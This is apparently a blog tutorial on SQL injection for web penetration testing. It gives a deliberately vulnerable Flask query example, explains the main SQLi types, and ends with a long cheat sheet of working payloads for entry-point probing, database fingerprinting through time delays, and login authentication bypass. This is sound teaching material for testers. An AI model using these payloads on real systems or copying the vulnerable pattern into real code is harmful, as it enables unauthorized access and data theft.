Web Application Penetration Testing (WAPT): SQL Injection
Hello world, SQL Injection (SQLi) is a cybersecurity threat targeting relational databases which exploits vulnerabilities in the back-end code to execute malicious SQL commands. This allows attackers to access and/or manipulate sensitive data. ππ
Below there is an example of a vulnerable snippet of Python code where the untrusted user input is directly concatenated to the SQL query without proper sanitization or use of prepared statements:
from flask import Flask, request
import sqlite3
app = Flask(__name__)
@app.route('/search')
def search():
# Connect to SQLite database
conn = sqlite3.connect('example.db')
c = conn.cursor()
# Retrieve the query parameter from the URL
user_input = request.args.get('query', '')
# Vulnerable SQL query
query = "SELECT * FROM users WHERE name = '" + user_input + "'"
# Execute the SQL query
c.execute(query)
# Fetch all results
results = c.fetchall()
# Close the database connection
conn.close()
# Convert results to a string for display
return str(results)
if __name__ == '__main__':
app.run(debug=True)Snippet of Python Code Vulnerable to SQL Injection
Let's see how it works in a high-level scheme:
The techniques described below are intended solely for educational purposes and ethical penetration testing. They should never be used for malicious activities or unauthorized access.
There are three main types of SQL injection attacks:
- In-Band SQL Injection: This is the most common and straightforward form of SQLi, the attacker uses the same communication channel (e.g., HTTP requests and responses to and from the back-end server) for launching the attack and gathering the results. This type of SQL Injection attacks can be divided into:
- Error-based SQLi: The server's response contains verbose SQL error messages which can be used to extract information about the database's structure (e.g., SQL version), but also to enumerate the entire database.
- Union-based SQLi: By exploiting the UNION SQL operator, it is possible to combine the results of two or more SELECT statements into a single result which is returned as part of the HTTP response.
- Inferential SQL Injection (Blind SQL Injection): The attacker sends the malicious SQL payloads through HTTP requests and observes the response and behavior of the server to gather the results. This type of SQL Injection attacks can be divided into:
- Boolean-based Blind SQLi: The server's response is different (e.g., the status code changes) depending on the concatenated query is true or false. In this way, the malicious user can enumerate the entire database even though no data from the database is returned.
- Time-based Blind SQLi: The attacker injects a function (e.g., WAITFOR DELAY or SLEEP) to force the database to wait for a specified amount of time before responding. The response time indicates to the bad guy if the result of the query is true or false.
- Out-of-Band SQL Injection: The malicious actor is unable to use the same channel to both launch the attack and gather information. This type of SQL Injection attacks can be divided into:
- DNS-based SQLi: The database is forced to resolve DNS addresses in a way that allows the attacker to send data to a domain he/she controls.
- HTTP-based SQLi: The database is forced to send HTTP requests (containing interesting data) to a server the attacker controls.
SQL Injection Cheat Sheet
There are some common SQL Injection payloads, but there are also ad-hoc payloads for specific DBMS (DataBase Management System). Here are my favorite payloads (based on those provided by PayloadsAllTheThings and HackTricks):
SQL Injection Entry Point Identification
'
' --
"
" --
`
` --
#
;
)
')
")
`)
'))
"))
`))
%27
%22
%60
%23
%3B
)
%27)
%22)
60)
%27))
%22))
%60))SQL Injection Entry Point Identification
DBMS Identification
# MYSQL
' and conv('a',16,2)=conv('a',16,2) --
" and conv('a',16,2)=conv('a',16,2) --
' and conv('a',16,2)=conv('a',16,2) and '1'='1
" and conv('a',16,2)=conv('a',16,2) and "1"='1
' + sleep(30)
' and sleep(30)
' && sleep(30)
' | sleep(30)
" + sleep(30)
" and sleep(30)
" && sleep(30)
" | sleep(30)
' + sleep(30) --
' and sleep(30) --
' && sleep(30) --
' | sleep(30) --
" + sleep(30) --
" and sleep(30) --
" && sleep(30) --
" | sleep(30) --
# MSSQL
' and USER_ID(1)=USER_ID(1) and '1'='1
" and USER_ID(1)=USER_ID(1) and "1"="1
' and USER_ID(1)=USER_ID(1) --
" and USER_ID(1)=USER_ID(1) --
' WAITFOR DELAY '0:0:30
" WAITFOR DELAY "0:0:30
' WAITFOR DELAY '0:0:30'
" WAITFOR DELAY "0:0:30"
' WAITFOR DELAY '0:0:30' --
" WAITFOR DELAY "0:0:30" --
# ORACLE
' and ROWNUM=ROWNUM and '1'='1
" and ROWNUM=ROWNUM and "1"="1
' AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10)
" AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10)
' AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10) --
" AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10) --
# POSTGRESQL
' and 5::int=5 and '1'='1
" and 5::int=5 and "1"="1
' || pg_sleep(30)
" || pg_sleep(30)
# SQLITE
' and sqlite_version()=sqlite_version() and '1'='1
" and sqlite_version()=sqlite_version() and "1"="1
' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))
" AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))
' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))) --
" AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))) --
# MSACCESS
' and val(cvar(1))=1 and '1'='1
" and val(cvar(1))=1 and "1"="1DBMS Identification
Authentication Bypass
' --
" --
' or '1'='1
" or "1"="1
or true --
" or true --
' or true --
") or true --
') or true --
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1 = 1
or 1 = 1 --
or 1 = 1 #
or 1 = 1 /*
admin' --
admin' #
admin' /*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin" /*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"='1'#
admin" or "1"="1"/*
admin" or 1=1 or ''='
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"='1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
administrator' --
administrator' #
administrator' /*
administrator' or '1'='1
administrator' or '1'='1'--
administrator' or '1'='1'#
administrator' or '1'='1'/*
administrator'or 1=1 or ''='
administrator' or 1=1
administrator' or 1=1--
administrator' or 1=1#
administrator' or 1=1/*
administrator') or ('1'='1
administrator') or ('1'='1'--
administrator') or ('1'='1'#
administrator') or ('1'='1'/*
administrator') or '1'='1
administrator') or '1'='1'--
administrator') or '1'='1'#
administrator') or '1'='1'/*
administrator" --
administrator" #
administrator" /*
administrator" or "1"="1
administrator" or "1"="1"--
administrator" or "1"='1'#
administrator" or "1"="1"/*
administrator" or 1=1 or ''='
administrator" or 1=1
administrator" or 1=1--
administrator" or 1=1#
administrator" or 1=1/*
administrator") or ("1"="1
administrator") or ("1"="1"--
administrator") or ("1"='1"#
administrator") or ("1"="1"/*
administrator") or "1"="1
administrator") or "1"="1"--
administrator") or "1"="1"#
administrator") or "1"="1"/*
ADMIN' --
ADMIN' #
ADMIN' /*
ADMIN' or '1'='1
ADMIN' or '1'='1'--
ADMIN' or '1'='1'#
ADMIN' or '1'='1'/*
ADMIN'or 1=1 or ''='
ADMIN' or 1=1
ADMIN' or 1=1--
ADMIN' or 1=1#
ADMIN' or 1=1/*
ADMIN') or ('1'='1
ADMIN') or ('1'='1'--
ADMIN') or ('1'='1'#
ADMIN') or ('1'='1'/*
ADMIN') or '1'='1
ADMIN') or '1'='1'--
ADMIN') or '1'='1'#
ADMIN') or '1'='1'/*
ADMIN" --
ADMIN" #
ADMIN" /*
ADMIN" or "1"="1
ADMIN" or "1"="1"--
ADMIN" or "1"='1'#
ADMIN" or "1"="1"/*
ADMIN" or 1=1 or ''='
ADMIN" or 1=1
ADMIN" or 1=1--
ADMIN" or 1=1#
ADMIN" or 1=1/*
ADMIN") or ("1"="1
ADMIN") or ("1"="1"--
ADMIN") or ("1"='1"#
ADMIN") or ("1"="1"/*
ADMIN") or "1"="1
ADMIN") or "1"="1"--
ADMIN") or "1"="1"#
ADMIN") or "1"="1"/*Authentication Bypass
The most famous tool to automatically exploit SQL Injection vulnerabilities is SQLmap. It is extremely useful for pentesting, so I will write an entire article about it.
Some interesting resources:
Got thoughts or questions about SQL injection? Share your insights or ask away in the comments below. Letβs tackle cybersecurity challenges together! π€